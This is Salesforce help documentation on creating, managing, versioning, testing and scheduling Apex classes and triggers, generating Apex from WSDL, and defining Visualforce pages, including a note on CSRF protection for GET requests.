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APEX CODE

Apex Code Overview
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

Apex is a strongly typed, object-oriented programming language that allows developers to execute flow and transaction control
statements on the Force.com platform server in conjunction with calls to the Force.com API. Using syntax that looks like Java
and acts like database stored procedures, Apex enables developers to add business logic to most system events, including button
clicks, related record updates, and Visualforce pages. Apex code can be initiated by Web service requests and from triggers on
objects.

Apex can be stored on the platform in two different forms:

• A class  is a template or blueprint from which Apex objects are created. Classes consist of other classes, user-defined
methods, variables, exception types, and static initialization code from Setup, in Develop > Apex Classes. See Managing
Apex Classes on page 3580.

• A trigger is Apex code that executes before or after specific data manipulation language (DML) events occur, such as before
object records are inserted into the database, or after records have been deleted. Triggers are stored as metadata in Salesforce.
A list of all triggers in your organization is located in Setup at Develop > Apex Triggers. See Managing Apex Triggers
on page 3581.

Apex generally runs in system context; that is, the current user's permissions, field-level security, and sharing rules aren’t taken
into account during code execution.

You must have at least 75% of your Apex covered by unit tests before you can deploy your code to production environments.
In addition, all triggers must have some test coverage. See About Apex Unit Tests on page 3752.

After creating your classes and triggers, as well as your tests, replay the execution using the Developer Console.

Note: You can add, edit, or delete Apex using the Salesforce user interface only in a Developer Edition organization,
a Salesforce Enterprise Edition trial organization, or sandbox organization. In a Salesforce production organization,
you can only make changes to Apex by using the Metadata API deploy call, the Force.com IDE, or the Force.com
Migration Tool. The Force.com IDE and Force.com Migration Tool are free resources provided by salesforce.com
to support its users and partners, but are not considered part of our Services for purposes of the salesforce.com Master
Subscription Agreement.

For more information on the syntax and use of Apex, see the Force.com Apex Code Developer's Guide.
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Defining Apex Classes
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“Author Apex”To define, edit, delete, set security, set version settings, show dependencies, and run tests
for Apex classes:

Apex classes are stored as metadata in Salesforce.

Note: You can add, edit, or delete Apex using the Salesforce user interface only in a Developer Edition organization,
a Salesforce Enterprise Edition trial organization, or sandbox organization. In a Salesforce production organization,
you can only make changes to Apex by using the Metadata API deploy call, the Force.com IDE, or the Force.com
Migration Tool. The Force.com IDE and Force.com Migration Tool are free resources provided by salesforce.com
to support its users and partners, but are not considered part of our Services for purposes of the salesforce.com Master
Subscription Agreement.

To create a class:

1. From Setup, click Develop > Apex Classes.
2. Click New.
3. Click Version Settings to specify the version of Apex and the API used with this class. If your organization has installed

managed packages from the AppExchange, you can also specify which version of each managed package to use with this
class. Use the default values for all versions. This associates the class with the most recent version of Apex and the API,
as well as each managed package. You can specify an older version of a managed package if you want to access components
or functionality that differs from the most recent package version. You can specify an older version of Apex and the API
to maintain specific behavior.

4. In the class editor, enter the Apex code for the class. A single class can be up to 1 million characters in length, not including
comments, test methods, or classes defined using @isTest.

5. Click Save to save your changes and return to the class detail screen, or click Quick Save to save your changes and continue
editing your class. Your Apex class must compile correctly before you can save your class.

Once saved, classes can be invoked through class methods or variables by other Apex code, such as a trigger.

Note: To aid backwards-compatibility, classes are stored with the version settings for a specified version of Apex
and the API. If the Apex class references components, such as a custom object, in installed managed packages, the
version settings for each managed package referenced by the class is saved too. Additionally, classes are stored with
an isValid flag that is set to true as long as dependent metadata has not changed since the class was last compiled.
If any changes are made to object names or fields that are used in the class, including superficial changes such as edits
to an object or field description, or if changes are made to a class that calls this class, the isValid flag is set to false.
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When a trigger or Web service call invokes the class, the code is recompiled and the user is notified if there are any
errors. If there are no errors, the isValid flag is reset to true.

See Also:
Managing Apex Classes
Viewing Apex Classes
Managing Version Settings for Apex

Defining Apex Triggers
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

Standard Objects, Campaigns, Cases, and Emails are not available in Database.com.

User Permissions Needed

“Author Apex”To define Apex triggers:

Apex triggers are stored as metadata in the application under the object with which they are associated.

Note: You can add, edit, or delete Apex using the Salesforce user interface only in a Developer Edition organization,
a Salesforce Enterprise Edition trial organization, or sandbox organization. In a Salesforce production organization,
you can only make changes to Apex by using the Metadata API deploy call, the Force.com IDE, or the Force.com
Migration Tool. The Force.com IDE and Force.com Migration Tool are free resources provided by salesforce.com
to support its users and partners, but are not considered part of our Services for purposes of the salesforce.com Master
Subscription Agreement.

To define a trigger:

1. For a standard object, from Setup, click Customize, click the name of the object, then click Triggers.

For a custom object, from Setup, click Create > Objects and click the name of the object.

For campaign members, from Setup, click Customize > Campaigns > Campaign Member > Triggers.

For case comments, from Setup, click Customize > Cases > Case Comments > Triggers.

For email messages, from Setup, click Customize > Cases > Email Messages > Triggers.

For comments on ideas, from Setup, click Customize > Ideas > Idea Comments > Triggers.

For the Attachment, ContentDocument, and Note standard objects, you can’t create a trigger in the Salesforce user interface.
For these objects, create a trigger using development tools, such as the Developer Console or the Force.com IDE.
Alternatively, you can also use the Metadata API.

2. In the Triggers related list, click New.
3. Click Version Settings to specify the version of Apex and the API used with this trigger. If your organization has installed

managed packages from the AppExchange, you can also specify which version of each managed package to use with this
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trigger. Use the default values for all versions. This associates the trigger with the most recent version of Apex and the
API, as well as each managed package. You can specify an older version of a managed package if you want to access
components or functionality that differs from the most recent package version.

4. Click Apex Trigger and select the Is Active checkbox if the trigger should be compiled and enabled. Leave this checkbox
deselected if you only want to store the code in your organization's metadata. This checkbox is selected by default.

5. In the Body text box, enter the Apex for the trigger. A single trigger can be up to 1 million characters in length.

To define a trigger, use the following syntax:

trigger triggerName on ObjectName (trigger_events) {
code_block

}

where trigger_events can be a comma-separated list of one or more of the following events:

• before insert

• before update

• before delete

• after insert

• after update

• after delete

• after undelete

Note:

• You can only use the webService keyword in a trigger when it is in a method defined as asynchronous; that
is, when the method is defined with the @future keyword.

• A trigger invoked by an insert, delete, or update of a recurring event or recurring task results in a runtime
error when the trigger is called in bulk from the Force.com API.

6. Click Save.

Note:  Triggers are stored with an isValid flag that is set to true as long as dependent metadata has not changed
since the trigger was last compiled. If any changes are made to object names or fields that are used in the trigger,
including superficial changes such as edits to an object or field description, the isValid flag is set to false until
the Apex compiler reprocesses the code. Recompiling occurs when the trigger is next executed, or when a user re-saves
the trigger in metadata.

If a lookup field references a record that has been deleted, Salesforce clears the value of the lookup field by default.
Alternatively, you can choose to prevent records from being deleted if they’re in a lookup relationship.

See Also:
Managing Apex Triggers
Managing Version Settings for Apex
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Executing Anonymous Apex Code
The Developer Console allows you to execute Apex code as another way to generate debug logs that cover specific application
logic.

The Execute Anonymous Apex tool in the Developer Console runs the Apex code you enter using ExecuteAnonymous and
generates a debug log with the results of the execution.

Warning:  If you call a class that contains a testMethod, all DML statements of the test method execute. This
action can add unwanted data to your organization.

1. Click Debug > Open Execute Anonymous Window to open the Enter Apex Code window.

2. Enter the code you want to run in the Enter Apex Code window or click  to open the code editor in a new browser
window. To automatically open the resulting debug log when execution is complete, select Open Log.

Note:  You can't use the keyword static in anonymous code.

3. Execute the code:

a. To execute all code in the window, click Execute or CTRL+E.
b. To execute only selected lines of code, select the lines and click Execute Highlighted or CTRL+SHIFT+E.

4. If you selected Open Log, the log will automatically open in the Log Inspector. After the code executes, the debug log
will be listed on the Logs tab. Double-click the log to open it in the Log Inspector.

5. To execute the same code again without making changes, click Debug > Execute Last. If you want to modify the code,
click Debug > Open Execute Anonymous Window, to open the Enter Apex Code window with the previous entry.

See Also:
Debug Menu
Log Inspector
Using Debug Logs
Logs Tab
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Handling Apex Exceptions in Managed Packages
Available in: Unlimited, Developer, and Enterprise Editions

User Permissions Needed

“Create Force.com AppExchange Packages”To create packages:

“Upload Force.com AppExchange Packages”To upload packages:

“Author Apex”To create Apex:

When you create a managed package for Force.com AppExchange, you can specify a user to receive an email notification when
an exception occurs that is not caught by Apex. Uncaught exceptions can be thrown from:

• A Visualforce action or getter method

• A Web service method

• A trigger

The email that is sent has the following format:

--------------------------------------------------------------------------------
Subject: Developer script exception from CLASSNAME Apex script unhandled trigger
exception by user/organization: USER_ID/ORG_ID EXCEPTION_STRING STACK_TRACE

--------------------------------------------------------------------------------

For example:

--------------------------------------------------------------------------------
From: Apex Application? <info@salesforce.com> To: joeuser@salesforce.com
<joeuser@salesforce.com> Subject: Developer script exception from Gack WS? Date:
Mon, 26 Nov 2007 14:42:41 +0000 (GMT) (06:42 PST) Apex script unhandled trigger
exception by user/organization: 010x0000000rfPg/00Fx00000009ejj TestException.Test
Exception?: Gack WS exception Class.Gack WS?.gackTestException: line 4, column 11
--------------------------------------------------------------------------------

The number of emails generated for the same error is limited to 10 messages with the same subject in a 60 second period.
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Managing Apex Classes
Available in: Unlimited, Developer, and Enterprise Editions

User Permissions Needed

“Author Apex”To define, edit, delete, set security, set version settings, show dependencies, and run tests
for Apex classes:

An Apex class  is a template or blueprint from which Apex objects are created. Classes consist of other classes, user-defined
methods, variables, exception types, and static initialization code. Once successfully saved, class methods or variables can be
invoked by other Apex code, or through the SOAP API (or AJAX Toolkit) for methods that have been designated with the
webService keyword.

The Apex Classes page enables you to create and manage Apex classes. To access the Apex Classes page, from Setup, click
Develop > Apex Classes.

To create an Apex class, from the Apex Classes page, click New and write your Apex code in the editor.

While developers can write class methods according to the syntax outlined in the Force.com Apex Code Developer's Guide, classes
can also be automatically generated by consuming a WSDL document that is stored on a local hard drive or network. Creating
a class by consuming a WSDL document allows developers to make callouts to the external Web service in their Apex. From
the Apex Classes page, click Generate From WSDL to generate an Apex class from a WSDL document.

Once you have created an Apex class, you can do any of the following:

• Click Edit next to the class name to modify its contents in a simple editor.

• Click Del next to the class name to delete the class from your organization.

Note:

◊ You can add, edit, or delete Apex using the Salesforce user interface only in a Developer Edition organization,
a Salesforce Enterprise Edition trial organization, or sandbox organization. In a Salesforce production
organization, you can only make changes to Apex by using the Metadata API deploy call, the Force.com
IDE, or the Force.com Migration Tool. The Force.com IDE and Force.com Migration Tool are free resources
provided by salesforce.com to support its users and partners, but are not considered part of our Services for
purposes of the salesforce.com Master Subscription Agreement.

◊ You cannot delete a class that is specified as a controller for a Visualforce page or component.

◊ A  icon indicates that an Apex class was released in a managed package. Apex classes in packages have special
considerations. For more information, see the Force.com Quick Reference for Developing Packages.

◊ A  icon indicates that an Apex class is in an installed managed package. You cannot edit or delete a class in
a managed package.

◊ A  icon indicates that an Apex class in a previously released managed package will be deleted on the next
package upload. You can choose to undelete the Apex class through the package detail page.

• If an Apex class has any methods defined as a webService, you can click WSDL next to the class name to generate a
WSDL document from the class contents. This document contains all of the information necessary for a client to consume
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Apex Web service methods. All class methods with the webService keyword are included in the resulting WSDL
document.

• Click Security next to the class name to select the profiles that are allowed to execute methods in the class from top-level
entry points, such as Web service methods. For classes that are installed in your organization as part of a managed package,
this link only displays for those defined as global.

• Click Estimate your organization's code coverage to find out how much of the Apex code in your organization is currently
covered by unit tests. This percentage is based on the latest test results of tests that you’ve already executed. If you have no
test results or if you’ve cleared code coverage results, code coverage is listed at 0%.

Note:  The code coverage value computed by Estimate your organization's code coverage might differ from the
code coverage value computed after running all unit tests using Run All Tests. This is because Estimate your
organization's code coverage excludes classes that are part of installed managed packages while Run All Tests
doesn't.

• Click the percentage number in the Code Coverage column to see which lines in a class have been covered by Apex unit
tests.

• Click Clear Code Coverage to reset the code coverage results for all Apex triggers and classes to 0%.

• If you have unit tests in at least one Apex class, click Run All Tests to run all the unit tests in your organization.

• Click Compile all classes to compile all the Apex classes in your organization. If you have classes that are installed from
a managed package and that have test methods or are test classes, you must compile these classes first before you can view
them and run their test methods from the Apex Test Execution page. Managed package classes can be compiled only
through the Compile all classes link because they cannot be saved. Otherwise, saving Apex classes that aren't from a
managed package causes them to be recompiled. This link compiles all the Apex classes in your organization, whether or
not they are from a managed package.

Note:  The namespace prefix is added to Apex classes and triggers, Visualforce components and pages, brand templates,
folders, s-controls, static resources, web links, and custom report types if they are included in a managed package.
However, if you don't have customize application permissions, the namespace prefix field is not displayed for brand
templates, folders, and custom report types.

See Also:
Defining Apex Classes
Viewing Apex Classes

Managing Apex Triggers
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“Author Apex”To define, edit, delete, and show dependencies for Apex triggers:

A trigger is Apex code that executes before or after specific data manipulation language (DML) events occur, such as before
object records are inserted into the database, or after records have been deleted.
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Triggers are stored as metadata in Salesforce. A list of all triggers in your organization is located in Setup at Develop > Apex
Triggers. In addition to this list, triggers are associated and stored with specific objects. For standard objects, triggers are
located in Setup at Customize > Standard_Object_Name > Triggers, and on the object detail page for custom objects at
Create > Objects > Custom_Object_Name.

Note:  The namespace prefix is added to Apex classes and triggers, Visualforce components and pages, brand templates,
folders, s-controls, static resources, web links, and custom report types if they are included in a managed package.
However, if you don't have customize application permissions, the namespace prefix field is not displayed for brand
templates, folders, and custom report types.

Click New to create an Apex trigger.

Note:  You can only create triggers from the associated object, not from the Apex Triggers page.

Once you have created an Apex trigger:

• Click Edit next to the trigger name to modify its contents in a simple editor.

• Click Del next to the trigger name to delete the trigger from your organization.

• Click the percentage number in the Code Coverage column to see which lines in a trigger have been covered by Apex unit
tests.

Note:

• You can add, edit, or delete Apex using the Salesforce user interface only in a Developer Edition organization, a
Salesforce Enterprise Edition trial organization, or sandbox organization. In a Salesforce production organization,
you can only make changes to Apex by using the Metadata API deploy call, the Force.com IDE, or the Force.com
Migration Tool. The Force.com IDE and Force.com Migration Tool are free resources provided by salesforce.com
to support its users and partners, but are not considered part of our Services for purposes of the salesforce.com
Master Subscription Agreement.

• A  icon indicates that an Apex trigger is in an installed managed package. You cannot edit or delete a trigger
in a managed package.

• A  icon indicates that an Apex trigger in a previously released managed package will be deleted on the next
package upload. You can choose to undelete the Apex trigger through the package detail page.

See Also:
Defining Apex Triggers
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Managing Version Settings for Apex
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

Managed Packages are not available in Database.com.

User Permissions Needed

“Author Apex”To define, edit, delete, set security, set version settings, show dependencies, and run tests
for Apex classes:

To aid backwards-compatibility, classes are stored with the version settings for a specified version of Apex and the API. If the
Apex class references components, such as a custom object, in installed managed packages, the version settings for each managed
package referenced by the class is saved too. This ensures that as Apex, the API, and the components in managed packages
evolve in subsequent released versions, a class or trigger is still bound to versions with specific, known behavior.

A package version is a number that identifies the set of components uploaded in a package. The version number has the format
majorNumber.minorNumber.patchNumber (for example, 2.1.3). The major and minor numbers increase to a chosen value
during every major release. The patchNumber is generated and updated only for a patch release. Publishers can use package
versions to evolve the components in their managed packages gracefully by releasing subsequent package versions without
breaking existing customer integrations using the package.

To set the Salesforce.com API and Apex version for a class or trigger:

1. Edit either a class or trigger, and click Version Settings.
2. Select the Version of the Salesforce.com API. This is also the version of Apex associated with the class or trigger.
3. Click Save.

To configure the package version settings for a class or trigger:

1. Edit either a class or trigger, and click Version Settings.
2. Select a Version for each managed package referenced by the class or trigger. This version of the managed package will

continue to be used by the class or trigger if later versions of the managed package are installed, unless you manually update
the version setting. To add an installed managed package to the settings list, select a package from the list of available
packages. The list is only displayed if you have an installed managed package that is not already associated with the class
or trigger.

3. Click Save.

Note the following when working with package version settings:

• If you save an Apex class or trigger that references a managed package without specifying a version of the managed package,
the Apex class or trigger is associated with the latest installed version of the managed package by default.

• You cannot Remove a class or trigger's version setting for a managed package if the package is referenced in the class or
trigger. Use Show Dependencies to find where a managed package is referenced by a class or a trigger.
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Viewing Apex Classes
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“Author Apex”To define, edit, delete, set security, set version settings, show dependencies, and run tests
for Apex classes:

After you have created a class, you can view the code contained in the class, as well as the API against which the class was
saved, and whether the class is valid or active. From Setup, click Develop > Apex Classes, then click the name of the class
you want to view. While viewing a class, you can do any of the following:

• Click Edit to make changes to the class.

Note:

◊ You can add, edit, or delete Apex using the Salesforce user interface only in a Developer Edition organization,
a Salesforce Enterprise Edition trial organization, or sandbox organization. In a Salesforce production
organization, you can only make changes to Apex by using the Metadata API deploy call, the Force.com
IDE, or the Force.com Migration Tool. The Force.com IDE and Force.com Migration Tool are free resources
provided by salesforce.com to support its users and partners, but are not considered part of our Services for
purposes of the salesforce.com Master Subscription Agreement.

◊ A  icon indicates that an Apex class was released in a managed package. Apex classes in packages have special
considerations. For more information, see the Force.com Quick Reference for Developing Packages.

◊ A  icon indicates that an Apex class is in an installed managed package. You cannot edit or delete a class in
a managed package.

◊ A  icon indicates that an Apex class in a previously released managed package will be deleted on the next
package upload. You can choose to undelete the Apex class through the package detail page.

You can add, edit, or delete Apex using the Salesforce user interface only in a Developer Edition organization, a
Salesforce Enterprise Edition trial organization, or sandbox organization. In a Salesforce production organization,
you can only make changes to Apex by using the Metadata API deploy call, the Force.com IDE, or the Force.com
Migration Tool. The Force.com IDE and Force.com Migration Tool are free resources provided by salesforce.com
to support its users and partners, but are not considered part of our Services for purposes of the salesforce.com
Master Subscription Agreement.

• Click Delete to delete the class.

Note: You cannot delete a class that is specified as a controller for a Visualforce page or component.

• If your class has a method defined as a webService, click Generate WSDL to generate a WSDL document based on
the class.
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Note:  You cannot generate a WSDL document for classes defined as isTest.

• Click Download to download a copy of your Apex.

• Click Run Test to run the unit tests contained in the class.

• Click Security to set the Apex class level security.

• Click Show Dependencies to display the items, such as fields, objects, or other classes, that must exist for this class to be
valid.

The Class Summary tab displays the prototype of the class; that is, the classes, methods and variables that are available to
other Apex code. The Class Summary tab lists the access level and signature for each method and variable in an Apex class,
as well as any inner classes. If there is no prototype available, this tab is not available.

Note:

• For Apex classes not included in managed packages, only classes, methods and variables defined as either global
or public are displayed.

• For Apex classes included in managed packages, the Class Summary tab also lists the package version a particular
property or method was introduced. You can select a version number from the drop-down list to see the prototype
for the selected package version. The default value is the current installed version. A package developer can
deprecate an Apex method and upload a new package version, thus exposing an Apex class with a different
prototype. Only classes, methods and variables defined as global are displayed in prototypes for managed package
classes.

If an Apex class references components in installed managed packages, such as another class, trigger, or custom object, the
Version Settings tab lists the package versions of the packages containing the referenced components.

The Log Filters tab displays the debug log categories and debug log levels that you can set for the class.

See Also:
Defining Apex Classes
Managing Apex Classes
Debug Log Filtering for Apex Classes and Apex Triggers

Viewing Apex Trigger Details
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“Author Apex”To view Apex triggers:

Apex triggers are stored as metadata in the application under the object with which they are associated. You can also view all
triggers in Setup by clicking Develop > Apex Triggers.
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Note: You can add, edit, or delete Apex using the Salesforce user interface only in a Developer Edition organization,
a Salesforce Enterprise Edition trial organization, or sandbox organization. In a Salesforce production organization,
you can only make changes to Apex by using the Metadata API deploy call, the Force.com IDE, or the Force.com
Migration Tool. The Force.com IDE and Force.com Migration Tool are free resources provided by salesforce.com
to support its users and partners, but are not considered part of our Services for purposes of the salesforce.com Master
Subscription Agreement.

To view the details for a trigger, from Setup, click Develop > Apex Triggers, then click the name of the trigger. You can also
access the trigger details from the object. For a standard object, from Setup, click Customize, click the name of the object,
click Triggers, then click the name of the trigger. For a custom object, from Setup, click Create > Objects, click the name of
the object, then click the name of the trigger.

From the trigger detail page, you can do any of the following:

• Click Edit to modify the contents of the trigger.

Note: A  icon indicates that an Apex trigger is in an installed managed package. You cannot edit or delete a
trigger in a managed package.

• Click Delete to delete the trigger from your organization.

• Click Show Dependencies to display the items, such as fields, s-controls, or classes, that are referenced by the Apex code
contained in the trigger.

• Click Download Apex to download the text of the trigger. The file is saved with the name of the trigger as the file name,
with the filetype of .trg.

The trigger detail page shows the following information for a trigger:

• The name of the trigger

• The name of the object with which the trigger is associated, such as Account or Case.

• The API version that the trigger has been saved against.

• Whether a trigger is valid.

Note:  Triggers are stored with an isValid flag that is set to true as long as dependent metadata has not changed
since the trigger was last compiled. If any changes are made to object names or fields that are used in the trigger,
including superficial changes such as edits to an object or field description, the isValid flag is set to false until
the Apex compiler reprocesses the code. Recompiling occurs when the trigger is next executed, or when a user
re-saves the trigger in metadata.

If a lookup field references a record that has been deleted, Salesforce clears the value of the lookup field by default.
Alternatively, you can choose to prevent records from being deleted if they’re in a lookup relationship.

• Whether the trigger is active.

• The text of the Apex code contained in the trigger.

• If trigger references components in installed managed packages, such as an Apex class, a Visualforce page, a custom object,
and so on, the Version Settings section lists the package versions of the packages containing the referenced components.

• If the trigger is contained in an installed managed package, the Installed Package indicates the package name.

The Log Filters tab displays the debug log categories and debug log levels that you can set for the trigger. For more information,
see Debug Log Filtering for Apex Classes and Apex Triggers on page 3750.
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Creating an Apex Class from a WSDL
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“Author Apex”To define, edit, delete, set security, set version settings, show dependencies, and run tests
for Apex classes:

An Apex class can be automatically generated from a WSDL document that is stored on a local hard drive or network. Creating
a class by consuming a WSDL document allows developers to make callouts to the external Web service in their Apex.

Note:  Use Outbound Messaging to handle integration solutions when possible. Use callouts to third-party Web
services only when necessary.

To access this functionality:

1. In the application, from Setup, click Develop > Apex Classes.
2. Click Generate from WSDL.
3. Click Browse to navigate to a WSDL document on your local hard drive or network, or type in the full path. This WSDL

document is the basis for the Apex class you are creating.

Note:

The WSDL document that you specify might contain a SOAP endpoint location that references an outbound
port.

For security reasons, Salesforce restricts the outbound ports you may specify to one of the following:

• 80: This port only accepts HTTP connections.
• 443: This port only accepts HTTPS connections.
• 1024–66535 (inclusive): These ports accept HTTP or HTTPS connections.

4. Click Parse WSDL to verify the WSDL document contents. The application generates a default class name for each
namespace in the WSDL document and reports any errors. Parsing will fail if the WSDL contains schema types or schema
constructs that are not supported by Apex classes, or if the resulting classes exceed 1 million character limit on Apex classes.
For example, the Salesforce SOAP API WSDL cannot be parsed.

5. Modify the class names as desired. While you can save more than one WSDL namespace into a single class by using the
same class name for each namespace, Apex classes can be no more than 1 million characters total.

6. Click Generate Apex. The final page of the wizard shows which classes were successfully generated, along with any errors
from other classes. The page also provides a link to view successfully generated code.

The successfully-generated Apex class includes stub and type classes for calling the third-party Web service represented by
the WSDL document. These classes allow you to call the external Web service from Apex. For an example, see the Force.com
Apex Code Developer's Guide.

Note the following about the generated Apex:
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• If a WSDL document contains an Apex reserved word, the word is appended with _x when the Apex class is generated.
For example, limit in a WSDL document converts to limit_x in the generated Apex class. For a list of reserved words,
see the Force.com Apex Code Developer's Guide.

• If an operation in the WSDL has an output message with more than one element, the generated Apex wraps the elements
in an inner class. The Apex method that represents the WSDL operation returns the inner class instead of the individual
elements.

See Also:
Defining Apex Classes

Monitoring the Apex Job Queue
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

The Apex job queue lists all Apex jobs that have been submitted for execution. Jobs that have completed execution are listed,
as well as those that are not yet finished, including:

• Apex methods with the future annotation that have not yet been executed. Such jobs are listed as Future in the Job Type
column, and do not have values in the Total Batches or Batches Processed columns.

• Scheduled Apex jobs that have not yet finished executing.

◊ Such jobs are listed as Scheduled Apex in the Job Type column, don’t have values in the Total Batches or Batches
Processed columns, and always have a Queued status.

◊ Scheduled jobs can’t be aborted from this page; use the Scheduled Jobs page to manage or delete scheduled jobs.

◊ Even though a scheduled job appears on both the Apex Jobs and Scheduled Jobs pages, it counts only once against the
asynchronous Apex execution limit.

• Apex sharing recalculation batch jobs that have not yet finished execution. Such jobs are listed as Sharing Recalculation
in the Job Type column. The records in a sharing recalculation job are automatically split into batches. The Total Batches
column lists the total number of batches for the job. The Batches Processed column lists the number of batches that have
already been processed.

• Batch Apex jobs that have not yet finished execution. Such jobs are listed as Batch Apex in the Job Type column. The
records in a batch Apex job are automatically split into batches. The Total Batches column lists the total number of batches
for the job. The Batches Processed column lists the number of batches that have already been processed.

Note:  Sharing recalculation batch jobs are currently available through a limited release program. For information on
enabling Apex sharing recalculation batch jobs for your organization, contact salesforce.com.

The Status column lists the current status of the job. The possible values are:

DescriptionStatus

Job is awaiting executionQueued
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DescriptionStatus

The start method of the job has been invoked. This status
might last a few minutes depending on the size of the batch
of records.

Preparing

Job is being processedProcessing

Job was aborted by a userAborted

Job completed with or without failuresCompleted

Job experienced a system failureFailed

If one or more errors occur during batch processing, the Status Details column gives a short description of the first error. A
more detailed description of that error, along with any subsequent errors, is emailed to the user who started the running batch
class.

To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views. This is especially useful if you want to view only future methods, or view only Apex batch jobs.

Only one batch Apex job's start method can run at a time in an organization. Batch jobs that haven’t started yet remain in
the queue until they're started. Note that this limit doesn’t cause any batch job to fail and execute methods of batch Apex
jobs still run in parallel if more than one job is running.

For any type of Apex job, you can click Abort Job in the Action column to stop all processing for that job.

All batch jobs that have completed execution are removed from the batch queue list seven days after completion.

For more information about Apex, see the Force.com Apex Code Developer's Guide.

See Also:
Scheduling Apex

Scheduling Apex
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

Use the Apex scheduler if you have specific Apex classes that you want to run on a regular basis, or to run a batch Apex job
using the Salesforce user interface.

The scheduler runs as system—all classes are executed, whether or not the user has permission to execute the class.

Important: Salesforce schedules the class for execution at the specified time. Actual execution may be delayed based
on service availability.

To schedule jobs using the Apex scheduler:

1. Implement the Schedulable interface in an Apex class that instantiates the class you want to run.
2. From Setup, click Develop > Apex Classes and click Schedule Apex.
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3. Specify the name of a class that you want to schedule.
4. Specify how often the Apex class is to run.

• For Weekly—specify one or more days of the week the job is to run (such as Monday and Wednesday).
• For Monthly—specify either the date the job is to run or the day (such as the second Saturday of every month.)

5. Specify the start and end dates for the Apex scheduled class. If you specify a single day, the job only runs once.
6. Specify a preferred start time. The exact time the job starts depends on service availability.
7. Click Save.

Note:  You can only have 100 active or scheduled jobs concurrently.

Alternatively, you can call the System.scheduleBatch method to schedule the batch job to run once at a future time. For
more details, see “Using the System.scheduleBatch Method” in the Force.com Apex Code Developer's Guide.

After you schedule an Apex job, you can monitor the progress of the job on the All Scheduled Jobs page.

Once the job has completed, you can see specifics about the job (such as whether it passed or failed, how long it took to process,
the number of records process, and so on) on the Apex Jobs page.

FAQ

Apex FAQ
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

• What Is The Difference Between Apex Classes And Triggers?

• Can I Call an External Web Service With Apex?

• What are the Supported WSDL Schema Types for Apex Callouts?

Can I Call an External Web Service With Apex?
Yes. You can call operations of Web services with Apex. Using the Apex Classes page, you must first generate an Apex class
from the WSDL document of the external Web service before you can call its methods.

See Also:
Apex FAQ
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What are the Supported WSDL Schema Types for Apex
Callouts?

For callouts, Apex only supports the document literal wrapped WSDL style, along with primitive and built-in data types. We
recommend that you validate the WSDL document and ensure that it contains supported schema types. If a type is not
supported by Apex, a callout to a Web service operation may result in an error returned in the callout response , such as “Unable
to parse callout response. Apex type not found for element item”.

See Also:
Apex FAQ

What Is The Difference Between Apex Classes And Triggers?
An Apex class is a template or blueprint from which Apex objects are created. Classes consist of other classes, user-defined
methods, variables, exception types, and static initialization code A trigger is Apex code that executes before or after specific
data manipulation language (DML) events occur, such as before object records are inserted into the database, or after records
have been deleted. A trigger is associated with a standard or custom object and can call methods of Apex classes.

See Also:
Apex FAQ

VISUALFORCE

Visualforce Overview
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Visualforce uses a tag-based markup language to give developers a more powerful way to build applications and customize the
Salesforce user interface. With Visualforce you can:

• Create custom user interfaces that easily leverage standard Salesforce styles

• Create custom user interfaces that completely replace the standard Salesforce styles

• Build wizards and other navigation patterns that use data-specific rules for optimal, efficient application interaction

Visualforce comes with a rich component library that allows you to quickly build pages without having to create a lot of
functionality yourself. In the Visualforce markup language, each tag corresponds to a coarse or fine-grained component, such
as a section of a page, a related list, or a field. The components can either be controlled by the same logic that is used in
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standard Salesforce pages, or developers can associate their own logic with a custom controller or controller extension written
in Apex.

See Also:
Defining Visualforce Pages
What is a Custom Component?
Visualforce Developer's Guide

DEFINE VISUALFORCE PAGES

Defining Visualforce Pages
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create, edit, and set version settings for Visualforce pages:

You can create Visualforce pages either by using Visualforce development mode, or by creating pages in Setup.

To create a page using the “quick fix” tool available in Visualforce development mode:

1. In your browser, enter a URL in the following form: https://mySalesforceInstance/apex/nameOfNewPage,
where the value of mySalesforceInstance is the host name of your Salesforce instance (for example,
na3.salesforce.com) and the value of nameOfNewPage is the value you want to give to the Name field on your page
definition.

For example, if you want to create a page called “HelloWorld” and your Salesforce organization uses the
na3.salesforce.com instance, enter https://na3.salesforce.com/apex/HelloWorld.

Note: Page names can’t be longer than 40 characters.

2. Because the page does not yet exist, you are directed to an intermediary page from which you can create your new page.
Click Create page nameOfNewPage to create the new page. Both the page Name and Label are assigned the
nameOfNewPage value you specified in the URL.

To create pages in Setup:

1. From Setup, click Develop > Pages.
2. Click New.
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3. In the Name text box, enter the text that should appear in the URL as the page name. This name can contain only underscores
and alphanumeric characters, and must be unique in your organization. It must begin with a letter, not include spaces, not
end with an underscore, and not contain two consecutive underscores.

4. In the Label text box, enter the text that should be used to identify the page in Setup tools, such as when defining custom
tabs, or overriding standard buttons.

5. In the Name text box, enter the text that should be used to identify the page in the API. This name can contain only
underscores and alphanumeric characters, and must be unique in your organization. It must begin with a letter, not include
spaces, not end with an underscore, and not contain two consecutive underscores.

6. In the Description text box, specify an optional description of the page.
7. Select Available in Touch to enable Visualforce tabs associated with the Visualforce page to be used in Salesforce Touch.

This checkbox is available for pages set to API version 27.0 and later.

Note:

Standard object tabs that are overridden with a Visualforce page aren’t supported in Salesforce Touch, even if you
select Available in Touch for the page. The default Salesforce Touch page for the object is displayed instead of
the Visualforce page.

8. Select Require CSRF protection on GET requests to enable Cross Site Request Forgery (CSRF) protection for GET
requests for the page. When checked, it protects against CSRF attacks by modifying the page to require a CSRF confirmation
token, a random string of characters in the URL parameters. With every GET request, Visualforce checks the validity of
this string of characters and doesn’t load the page unless the value found matches the value expected.

Check this box if the page performs any DML operation when it’s initially loaded. When checked, all links to this page
need a CSRF token added to the URL query string parameters. This checkbox is available for pages set to API version
28.0 and later.

